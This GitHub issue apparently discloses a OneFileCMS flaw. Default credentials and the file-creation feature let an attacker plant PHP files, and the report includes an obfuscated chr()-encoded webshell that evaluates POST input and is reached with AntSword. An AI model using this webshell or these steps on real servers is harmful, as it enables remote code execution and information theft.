OneFileCMS icon indicating copy to clipboard operation
OneFileCMS copied to clipboard
verified publisher icon Self-Evident

Dangerous php files can be created resulting in information leakage and RCE

Open WindyAlexQ opened this issue 1 year ago • 0 comments

  1. Enter the page using the default username and password.

1713406204_24286

  1. Click "New File" to create a new file named test.php.

1713406296_6629

  1. The content of test.php is <? php phpinfo(); ? >

1713406427_30333

  1. Access test.php directly

1713406474_32602

  1. Follow the steps above to create the file test2.php with the following contents (for confused webshell) <?$_uU=chr(99).chr(104).chr(114);$_cC=$_uU(101).$_uU(118).$_uU(97).$_uU(108).$_uU(40).$_uU(36).$_uU(95).$_uU(80).$_uU(79).$_uU(83).$_uU(84).$_uU(91).$_uU(49).$_uU(93).$_uU(41).$_uU(59);$_fF=$_uU(99).$_uU(114).$_uU(101).$_uU(97).$_uU(116).$_uU(101).$_uU(95).$_uU(102).$_uU(117).$_uU(110).$_uU(99).$_uU(116).$_uU(105).$_uU(111).$_uU(110);$_=$_fF("",$_cC);@$_();?>

  2. Connect using AntSword

1713406657_29122

  1. You can get the webshell

1713406714_30908

WindyAlexQ avatar Apr 18 '24 02:04 WindyAlexQ